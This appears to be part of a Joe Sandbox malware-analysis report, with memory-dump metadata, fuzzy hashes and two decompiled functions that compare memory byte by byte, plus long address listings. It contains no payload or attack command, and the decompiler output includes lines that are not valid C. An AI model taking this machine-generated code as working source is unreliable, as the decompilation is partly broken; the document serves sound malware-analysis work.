                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24ac074b185b88253400bb75b0b5ae2b63546df32da5a1d515b6a2b8e47eac96
                                                        • Instruction ID: bd441fbc672426ef8a96d198e3af0c72976c7740009431e5d27227b783cfd455
                                                        • Opcode Fuzzy Hash: 24ac074b185b88253400bb75b0b5ae2b63546df32da5a1d515b6a2b8e47eac96
                                                        • Instruction Fuzzy Hash: D2F1B871A083098FC718CF29E58456EBBE2FFC9724F148B2EF48597295D630E945CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A20DE3 Relevance: .3, Instructions: 345COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A20DE3(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                                        0x00a20de3
                                                        0x00a20de3
                                                        0x00a20de9
                                                        0x00a20e70
                                                        0x00a20e72
                                                        0x00a20e74
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20e7a
                                                        0x00a20e80
                                                        0x00a20f07
                                                        0x00a20f09
                                                        0x00a20f0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20f11
                                                        0x00a20f17
                                                        0x00a20f9e
                                                        0x00a20fa0
                                                        0x00a20fa2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20fa8
                                                        0x00a20fae
                                                        0x00a21035
                                                        0x00a21037
                                                        0x00a21039
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2103f
                                                        0x00a21045
                                                        0x00a210cc
                                                        0x00a210ce
                                                        0x00a210d0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a210dc
                                                        0x00a21164
                                                        0x00a21166
                                                        0x00a21168
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2116e
                                                        0x00a21174
                                                        0x00a211fb
                                                        0x00a211fd
                                                        0x00a211ff
                                                        0x00a211ff
                                                        0x00000000
                                                        0x00a211ff
                                                        0x00a21181
                                                        0x00a21183
                                                        0x00a2119b
                                                        0x00a211a3
                                                        0x00a211a5
                                                        0x00a211bd
                                                        0x00a211c5
                                                        0x00a211c7
                                                        0x00a211df
                                                        0x00a211e7
                                                        0x00a211e9
                                                        0x00a211f2
                                                        0x00a211f2
                                                        0x00000000
                                                        0x00a211e9
                                                        0x00a211d0
                                                        0x00a211d9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a211d9
                                                        0x00a211ae
                                                        0x00a211b7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a211b7
                                                        0x00a2118c
                                                        0x00a21195
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21195
                                                        0x00a210ea
                                                        0x00a210ec
                                                        0x00a21104
                                                        0x00a2110c
                                                        0x00a2110e
                                                        0x00a21126
                                                        0x00a2112e
                                                        0x00a21130
                                                        0x00a21148
                                                        0x00a21150
                                                        0x00a21152
                                                        0x00a2115b
                                                        0x00a2115b
                                                        0x00000000
                                                        0x00a21152
                                                        0x00a21139
                                                        0x00a21142
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21142
                                                        0x00a21117
                                                        0x00a21120
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21120
                                                        0x00a210f5
                                                        0x00a210fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a210fe
                                                        0x00a21052
                                                        0x00a21054
                                                        0x00a2106c
                                                        0x00a21074
                                                        0x00a21076
                                                        0x00a2108e
                                                        0x00a21096
                                                        0x00a21098
                                                        0x00a210b0
                                                        0x00a210b8
                                                        0x00a210ba
                                                        0x00a210c3
                                                        0x00a210c3
                                                        0x00000000
                                                        0x00a210ba
                                                        0x00a210a1
                                                        0x00a210aa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a210aa
                                                        0x00a2107f
                                                        0x00a21088
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21088
                                                        0x00a2105d
                                                        0x00a21066
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21066
                                                        0x00a20fbb
                                                        0x00a20fbd
                                                        0x00a20fd5
                                                        0x00a20fdd
                                                        0x00a20fdf
                                                        0x00a20ff7
                                                        0x00a20fff
                                                        0x00a21001
                                                        0x00a21019
                                                        0x00a21021
                                                        0x00a21023
                                                        0x00a2102c
                                                        0x00a2102c
                                                        0x00000000
                                                        0x00a21023
                                                        0x00a2100a
                                                        0x00a21013
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21013
                                                        0x00a20fe8
                                                        0x00a20ff1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20ff1
                                                        0x00a20fc6
                                                        0x00a20fcf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20fcf
                                                        0x00a20f24
                                                        0x00a20f26
                                                        0x00a20f3e
                                                        0x00a20f46
                                                        0x00a20f48
                                                        0x00a20f60
                                                        0x00a20f68
                                                        0x00a20f6a
                                                        0x00a20f82
                                                        0x00a20f8a
                                                        0x00a20f8c
                                                        0x00a20f95
                                                        0x00a20f95
                                                        0x00000000
                                                        0x00a20f8c
                                                        0x00a20f73
                                                        0x00a20f7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20f7c
                                                        0x00a20f51
                                                        0x00a20f5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20f5a
                                                        0x00a20f2f
                                                        0x00a20f38
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20f38
                                                        0x00a20e8d
                                                        0x00a20e8f
                                                        0x00a20ea7
                                                        0x00a20eaf
                                                        0x00a20eb1
                                                        0x00a20ec9
                                                        0x00a20ed1
                                                        0x00a20ed3
                                                        0x00a20eeb
                                                        0x00a20ef3
                                                        0x00a20ef5
                                                        0x00a20efe
                                                        0x00a20efe
                                                        0x00000000
                                                        0x00a20ef5
                                                        0x00a20edc
                                                        0x00a20ee5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20ee5
                                                        0x00a20eba
                                                        0x00a20ec3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20ec3
                                                        0x00a20e98
                                                        0x00a20ea1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20def
                                                        0x00a20def
                                                        0x00a20df6
                                                        0x00a20df8
                                                        0x00a20e10
                                                        0x00a20e10
                                                        0x00a20e18
                                                        0x00a20e1a
                                                        0x00a20e32
                                                        0x00a20e32
                                                        0x00a20e3a
                                                        0x00a20e3c
                                                        0x00a20e54
                                                        0x00a20e54
                                                        0x00a20e5c
                                                        0x00a20e5e
                                                        0x00a20e67
                                                        0x00a20e67
                                                        0x00000000
                                                        0x00a20e5e
                                                        0x00a20e42
                                                        0x00a20e45
                                                        0x00a20e4e
                                                        0x00a209a6
                                                        0x00a209a6
                                                        0x00a21797
                                                        0x00a21797
                                                        0x00000000
                                                        0x00a20e4e
                                                        0x00a20e20
                                                        0x00a20e23
                                                        0x00a20e2c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20e2c
                                                        0x00a20dfe
                                                        0x00a20e01
                                                        0x00a20e0a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20e0a

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: c1722ae1a9552dfcbb5ee23270a6ae039f76279f4c8480c290e3ff247f77d1dd
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 6DC150322191A30AEB2D473DA57483FBAA15AE27B131A077DD4F7CB1D6FE20C564D620
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A21218 Relevance: .3, Instructions: 341COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A21218(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                                        0x00a21218
                                                        0x00a21218
                                                        0x00a2121e
                                                        0x00a212a6
                                                        0x00a212a8
                                                        0x00a212aa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a212b0
                                                        0x00a212b6
                                                        0x00a2133d
                                                        0x00a2133f
                                                        0x00a21341
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21347
                                                        0x00a2134d
                                                        0x00a213d4
                                                        0x00a213d6
                                                        0x00a213d8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a213de
                                                        0x00a213e4
                                                        0x00a2146b
                                                        0x00a2146d
                                                        0x00a2146f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2147b
                                                        0x00a21503
                                                        0x00a21505
                                                        0x00a21507
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2150d
                                                        0x00a21513
                                                        0x00a2159a
                                                        0x00a2159c
                                                        0x00a2159e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a215a4
                                                        0x00a215aa
